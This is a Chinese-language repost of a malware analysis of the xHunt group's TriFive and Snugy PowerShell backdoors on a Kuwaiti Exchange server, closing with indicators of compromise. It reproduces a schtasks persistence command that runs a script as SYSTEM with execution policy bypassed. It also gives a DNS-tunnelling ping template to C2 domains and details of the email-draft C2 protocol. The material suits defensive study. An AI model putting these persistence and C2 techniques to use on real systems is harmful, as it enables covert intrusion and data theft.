TriFive和Snugy后門的示例分析

這篇文章將為大家詳細講解有關TriFive和Snugy后門的示例分析，小編覺得挺實用的，因此分享給大家做個參考，希望大家閱讀完這篇文章后可以有所收獲。

寫在前面的話

xHunt活動從2018年7月份一直活躍至今，這個組織的主要目標針對的是科威特政府和航運運輸組織。近期研究人員發現，xHunt的攻擊者又攻擊了科威特一家機構的Microsoft Exchange服務器。雖然我們無法確認攻擊者是如何入侵這臺Exchange服務器的，但是根據此次事件相關的計劃任務創建時間戳，我們發現攻擊者早在2019年8月22日之前就已經能夠訪問這臺Exchange服務器了。在此活動中，攻擊者使用了兩個后門，一個是TriFive，另一個是Snugy的變種版本（這是一個Web Shell，我們稱之為BumbleBee）。

TriFive和Snugy后門本質上是PowerShell腳本，可以幫助攻擊者訪問被入侵的Exchange服務器，并使用不同的C2信道來進行通信。TriFive后門使用的是一個基于電子郵件的信道，這個信道可以使用Exchange Web服務（EWS）在被入侵的電子郵件帳號的已刪除郵件夾中創建郵件草稿。Snugy后門則使用的是DNS隧道來實現命令控制。

TriFive和Snugy后門

在2020年9月份，我們發現xHunt攻擊者入侵了科威特的一家機構組織。該組織的Exchange服務器上出現了通過IIS進程w3wp.exe執行可以命令的行為。攻擊者在發送這些命令時，使用的是一個被稱為BumbleBee的Web Shell，它已經被安裝在了受感染的Exchange服務器。我們在分析服務器日志時，發現了兩個由攻擊者創建的計劃任務，這兩個任務都會運行惡意的PowerShell腳本。我們現在還無法確定攻擊者是否使用了這些PowerShell腳本中的任何一個來安裝webshell，但是我們相信攻擊者在日志記錄事件之前就已經訪問過這臺Exchange服務器了。

攻擊者在這臺Exchange服務器上創建了兩個任務，即ResolutionHosts和ResolutionHosts，這兩個任務都是在c:\Windows\System32\tasks\Microsoft\Windows\WDI文件夾中創建的。默認情況下，該文件夾在Windows系統上還存儲一個合法的ResolutionHost任務，具體如下圖所示。合法的ResolutionHost任務與Windows診斷基礎結構（WDI）解析主機關聯，它主要用于為系統上出現的問題提供交互式故障排除。我們認為，攻擊者選擇這個任務名稱主要是為了隱藏自己的攻擊活動。

在2019年8月28日和2019年10月22日，攻擊者創建了ResolutionHosts和ResolutionHosts任務，以運行兩個獨立的基于PowerShell的后門。攻擊者使用這兩個調度任務作為持久性方法，因為計劃任務會反復運行這兩個PowerShell腳本，不過運行的時間間隔不同。下圖顯示的是這兩個任務及其相關的創建時間、運行間隔和執行的命令。這兩個任務執行的命令將嘗試運行splwow64.ps1和OfficeIntegrator.ps1，分別是我們稱之為TriFive的后門和CASHY200的變種（我們稱之為Snugy）。這些腳本存儲在系統上的兩個單獨的文件夾中，這很可能是為了避免兩個后門都被發現和刪除。

上圖還顯示，TriFive后門每5分鐘運行一次，而Snugy后門每30分鐘運行一次。我們無法確認間隔時間差異背后的確切原因，但可能與后門相關的C2通道的隱蔽性有關。比如說，Snugy使用DNS隧道作為C2信道，因此它的間隔可能比TriFive長，與TriFive使用的基于電子郵件的C2信道相比，Snugy使用的是一個更加明顯的C2信道，因此被檢測到的可能性更高。

我們現在還無法確認攻擊者是如何創建ResolutionHosts和ResolutionHosts任務的。但是，我們知道攻擊者在其他系統上安裝Snugy樣本時，攻擊者使用的是批處理腳本來創建名為SystemDataProvider和CacheTask的計劃任務。比如說，下面的批處理腳本將創建并運行名為SystemDataProvider的計劃任務，并最終運行名為xpsrchvw.ps1的Snugy樣本：

schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\Windows\SideShow\SystemDataProvider” /tr “powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1” /ru SYSTEM & schtasks /run /tn “\Microsoft\Windows\SideShow\SystemDataProvider”

TriFive后門

TriFive是一個以前從未被發現過的PowerShell后門，xHunt的攻擊者會在受感染的Exchange服務器上安裝這個后門，并通過一個計劃任務每五分鐘執行一次。TriFive通過登錄合法用戶的收件箱并從“已刪除郵件”文件夾中的電子郵件草稿中獲取PowerShell腳本，從而提供了對Exchange服務器的持久化后門訪問。TriFive樣本使用了目標組織的合法帳戶名和憑據，這也表明在安裝TriFive后門之前，攻擊者已成功竊取了目標的賬戶憑證。

事實上，基于電子郵件的C2也在Hisoka工具中使用過，雖然Hisoka工具使用電子郵件草稿發送和接收數據，但這些草稿仍保留在草稿文件夾中，而TriFive后門則專門將其電子郵件草稿保存到“已刪除郵件”文件夾中。

為了向后門發出命令，攻擊者需要登錄到同一個合法的電子郵件帳戶并創建一個主題為555的電子郵件草稿，其中就包括了加密和Base64編碼格式的命令。下圖顯示的一封包含演示命令的郵件，主題為555，郵件內容為woFyeWt3cw==，該腳本將通過PowerShell執行：

為了運行攻擊者提供的命令，PowerShell腳本需要登錄到Exchange服務器上的合法電子郵件帳戶，并檢查“已刪除郵件”文件夾中主題為555的電子郵件。腳本將打開電子郵件草稿，并使用Base64解碼電子郵件消息正文中的內容，然后通過從每個字符中減去10來解密解碼命令內容。然后，腳本會使用PowerShell的內置Invoke Expression（iex）cmdlet來生成明文內容。在執行提供的PowerShell代碼之后，腳本將對結果進行加密，方法是在每個字符上加10，并對密文進行Base64編碼。接下來，TriFive會將命令結果發送給攻擊者，并將編碼的密文設置為電子郵件草稿的消息體，它將保存在主題為555的“已刪除郵件”文件夾中。下圖顯示了TriFive腳本創建的“已刪除郵件”文件夾中的一個電子郵件草稿樣例，它會將命令的運行結果以主題為555，消息內容為“bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA”的郵件進行發送。

TriFive PowerShell腳本并不是通過代碼循環來實現持久化運行的，而是通過前面提到的ResolutionsHosts調度任務來實現其持久化操作。

Snugy后門

我們在ResolutionHosts任務中看到的OfficeIntegrator.ps1文件是一個基于PowerShell的后門，我們將其稱之為Snugy，它將允許攻擊者獲取目標系統的主機名并執行命令。Snugy是CASHY200后門的一個變種版本，攻擊者也曾在之前的xHunt活動中使用過這個后門。在2019年7月，趨勢科技曾為這個后門創建過檢測簽名-Backdoor.PS1.NETERO.A，這也表明CASHY200的這個特殊變種已經存在一年多了。

Snugy樣本會隨機選擇下列域名來作為其C2域名：

hotsoft[.]icu

uplearn[.]top

lidarcc[.]icu

deman1[.]icu

跟CASHY200后門的早期變種版本類似，Snugy變種將使用下列命令來跟自定義域名連接，并嘗試在將ICMP請求發送到解析IP地址之前解析該域：

cmd /c ping -n 1 <custom crafted sub-domain>.<C2 domain>

Snugy將使用下列正則表達式來從ping命令的結果中提取出IP地址：

\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b

下面給出的是Snugy后門的命令處理服務器：

Snugy創建的子域名包含一個通信類型字段，該字段定義了數據字段中元素的順序，下面給出是C2域名結構：

<character for communication type><character for order of fields in data section><data section>.<C2 domain>

跟xHunt有關的基礎設施

入侵威脅指標IoC

TriFive樣本：

407e5fe4f6977dd27bc0050b2ee8f04b398e9bd28edd9d4604b782a945f8120f

Snugy樣本：

c18985a949cada3b41919c2da274e0ffa6e2c8c9fb45bade55c1e3b6ee9e1393   6c13084f213416089beec7d49f0ef40fea3d28207047385dda4599517b56e127   efaa5a87afbb18fc63dbf4527ca34b6d376f14414aa1e7eb962485c45bf38372 a4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c

Snugy C2域名：

deman1[.]icu

hotsoft[.]icu

uplearn[.]top

lidarcc[.]icu

sharepoint-web[.]com

計劃任務名稱：

ResolutionHosts

ResolutionsHosts

SystemDataProvider

CacheTask-

關于“TriFive和Snugy后門的示例分析”這篇文章就分享到這里了，希望以上內容可以對大家有一定的幫助，使各位可以學到更多知識，如果覺得文章不錯，請把它分享出去讓更多的人看到。